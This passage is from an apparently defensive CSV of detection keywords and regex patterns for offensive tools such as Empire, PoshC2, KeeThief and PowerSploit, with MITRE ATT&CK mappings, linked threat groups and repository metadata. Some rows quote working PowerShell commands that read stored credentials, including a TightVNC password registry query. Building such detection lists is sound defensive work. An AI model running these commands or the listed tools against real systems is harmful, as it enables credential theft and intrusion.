Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46056"
"*get-implantworkingdirectory*",".{0,1000}get\-implantworkingdirectory.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46057"
"*Get-InactiveDomainAdmins*",".{0,1000}Get\-InactiveDomainAdmins.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","46058"
"*Get-IndexedItem.ps1*",".{0,1000}Get\-IndexedItem\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46059"
"*Get-Information_exfil.ps1*",".{0,1000}Get\-Information_exfil\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","46060"
"*Get-InstalledAV *",".{0,1000}Get\-InstalledAV\s.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","46061"
"*Get-InternetExplorerBookmarks*",".{0,1000}Get\-InternetExplorerBookmarks.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46062"
"*Get-InternetExplorerHistory*",".{0,1000}Get\-InternetExplorerHistory.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46063"
"*Get-Item -Path ""HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths*",".{0,1000}Get\-Item\s\-Path\s\""HKLM\:\\SOFTWARE\\Microsoft\\Windows\sDefender\\Exclusions\\Paths.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#registry","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","46064"
"*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*",".{0,1000}Get\-ItemProperty\s\-Path\sHKLM\:\\Software\\TightVNC\\Server\s\-Name\s.{0,1000}Password.{0,1000}\s\|\sselect\s\-ExpandProperty\sPassword.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#registry","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46065"
"*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name *RunAsPPL*",".{0,1000}Get\-ItemProperty\s\-Path\sHKLM\:\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\-Name\s.{0,1000}RunAsPPL.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Sometimes LSASS is configured to run as a protected process (PPL). You can query this with PowerShell as follows.","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Discovery","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","#registry","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46066"
"*GetKcpPasswordInfo*",".{0,1000}GetKcpPasswordInfo.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46067"
"*Get-KeePassconfig*",".{0,1000}Get\-KeePassconfig.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46068"
"*Get-KeePassConfigTrigger *",".{0,1000}Get\-KeePassConfigTrigger\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46069"
"*Get-KeePassConfigTrigger*",".{0,1000}Get\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46070"
"*Get-KeePassDatabaseKey *",".{0,1000}Get\-KeePassDatabaseKey\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46071"
"*Get-KeePassDatabaseKey *",".{0,1000}Get\-KeePassDatabaseKey\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","46072"
"*Get-KeePassDatabaseKey*",".{0,1000}Get\-KeePassDatabaseKey.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46073"
"*Get-KeePassDatabaseKey*",".{0,1000}Get\-KeePassDatabaseKey.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46074"
"*Get-KeePassINIFields*",".{0,1000}Get\-KeePassINIFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46075"
"*Get-KeePassXMLFields*",".{0,1000}Get\-KeePassXMLFields.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46076"
"*Get-KerberosServiceTicket*",".{0,1000}Get\-KerberosServiceTicket.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46077"
"*Get-KerberosServiceTicket.ps1*",".{0,1000}Get\-KerberosServiceTicket\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46078"
"*GetKeyloggerLogsResponse*",".{0,1000}GetKeyloggerLogsResponse.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","46079"
"*Get-KeystrokeData*",".{0,1000}Get\-KeystrokeData.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46080"
"*Get-Keystrokes *",".{0,1000}Get\-Keystrokes\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","46081"
"*Get-Keystrokes*",".{0,1000}Get\-Keystrokes.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46082"
"*get-keystrokes*",".{0,1000}get\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","46083"
